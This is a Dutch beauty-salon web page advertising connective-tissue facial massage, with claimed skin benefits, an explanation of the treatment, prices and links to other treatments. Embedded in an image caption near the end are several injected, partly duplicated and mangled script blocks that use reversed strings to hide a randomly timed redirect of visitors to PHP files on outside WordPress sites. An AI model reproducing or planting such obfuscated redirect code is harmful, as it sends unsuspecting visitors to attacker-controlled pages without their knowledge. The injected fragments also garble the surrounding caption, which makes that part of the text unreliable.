Bindweefselmassage

Intensieve reiniging, Peeling, verwijderen oneffenheden, Intensieve Bindweefselmassage, aangepast Serum en Masker en we sluiten af met dag of nachtverzorging.

DE EFFECTEN VAN BINDWEEFSELMASSAGE

 • Verbetering van de huidconditie
 • Stimulering van de doorbloeding van de huid
 • Stressvermindering door opheffen van de onderhuidse verklevingen
 • Verbetering van de opname van werkstoffen
 • Nieuwe aanmaak van collageen
 • Bevordering van de celdeling
 • Verbetering van de huidstructuur
 • Vermindering van rimpels, kraaienpootjes, passieve acné en littekens
 • Positieve invloed op de huidweerstand

HOE WERKT BINDWEEFSELMASSAGE?
Bindweefselmassage is een pittige behandeling, zeker niet pijnloos, maar toch is dit één van de populairste behandelingen. Wat is het nut van bindweefselmassage en kan het geen kwaad? Hieronder de ins en outs van bindweefselmassage.
Een jong, strak en rimpelvrij gezicht bestaat van binnenuit goed bindweefsel. Dit bindweefsel zit vol collageen en elastine. Het gehalte van het collageen en elastine is dan zéér hoog is in ons bindweefsel. Tijdens het verouderen van de huid wordt er minder collageen en elastine in het bindweefsel aangemaakt. De rek gaat eruit als het ware. De huid wordt slapper wat tot het gevolg heeft: rimpels!
Bij bindweefselmassage wordt de onderste laag van de huid, het onderhuidse bindweefsel geprikkeld. Door de stress/verklevingen uit de huid te masseren, wordt het hele gebied behandeld. Een bindweefselmassage bevordert de doorbloeding, versnelt de afvoer van afvalstoffen en verbeterd de effectiviteit van de spieren. Een cosmetische bindweefselmassage werkt cel vernieuwend, de huid ziet er jonger en steviger uit. Een bindweefselmassage is een goede manier om de huidconditie te verbeteren. De behandeling verhoogt de doorbloeding en activeert de stofwisseling. Deze massage is geschikt als rimpel- en littekenbehandeling. Het is zeer belangrijk dat de bindweefselmassage goed wordt uitgeoefend op de middelste en onderste huidlaag. Door de diepe massage technieken die op het bindweefsel inwerken, vervormen de fibroblasten, waardoor er collageen wordt aangemaakt en de elasticiteit in de huid wordt verbeterd.

WAT IS BINDWEEFSEL?
Bindweefsel is vergelijkbaar met het cement tussen de bouwstenen van een huis. Het verbindt ons hele lichaam en ondersteunt de organen, gewrichten en spieren. Bindweefsel leidt ook bloedvaten en zenuwen naar de organen en beschermt tegen infecties. Het onderhuidse bindweefsel isoleert warmte, slaat energie op en is verantwoordelijk voor het transport van zuurstof, voeding en afvalstoffen.

WAT DOET BINDWEEFSELMASSAGE VOOR DE HUID?
Bindweefselmassage is een diepe massage uitgevoerd op de bindweefsellaag met als uiteindelijk doel verbetering van de huidconditie. De doorbloeding wordt gestimuleerd waardoor de huid wordt aangezet tot cel vernieuwing en versteviging. Verklevingen beperken de doorbloeding en kunnen het functioneren van de verschillende onderste huidlagen beperken, deze verklevingen worden losgemaakt. De stofwisseling, de aanmaak van nieuw collageen en elastine wordt bevorderd.

WAARVOOR ZOU IK EEN BINDWEEFSELMASSAGE ONDERGAAN?
Bindweefselmassage is een perfecte anti-Aging behandeling! Ook passen we de bindweefselmassage vaak toe als voorbehandeling voor cosmetisch chirurgische ingrepen, passieve acne, afwijkingen in de talgafscheiding, ‘degeneratie’ van de huid, rimpels en huidplooien, hypertrofische, keloïde, atrofische en scleroserende littekens. Bindweefselmassage zorgt ervoor dat de huid er aanzienlijk frisser, jonger en strakker uitziet. Bij herhaalde behandelingen kan zelfs duurzame structurele verbetering van de huid optreden.

 • Vanwege de intensiteit van deze behandeling is het belangrijk dat u in goede gezondheid verkeerd.
 • Door registratie van onze Specialisaties bij de Anbos en onze persoonlijke AGB Code, worden veel behandelingen door uw zorgverzekeraar vergoed.
Bindweefsel-massage Gezicht
€ 81,95

Prijs per behandeling

€ 81,95
Bindweefsel-massage Kuur Gezicht
€ 588,50

Prijs voor 8 behandelingen
1x per week

€ 588,50

Vraag onze Huidspecialiste voor meer informatie over deze Bindweefselmassage huid verbeterende behandeling.

We hopen u snel te zien bij Schoonheidssalon Puur Tiel.

De schoonheidsspecialiste in Tiel

Young Model Woman with Skin Problem and Clear Skin Face Closeup Portrait. Unhealthy and Healthy Skin After Treatment. Facial Treatment, Medicine and Cosme<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-re<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tology Concept

Acne behandeling

Comparison portrait of a woman with problematic skin without and with makeup

Acne intensief

beautiful woman relaxing with herbal face mask

Bio-peeling

Mature Woman having relaxing head and face massage

Bindweefselmassage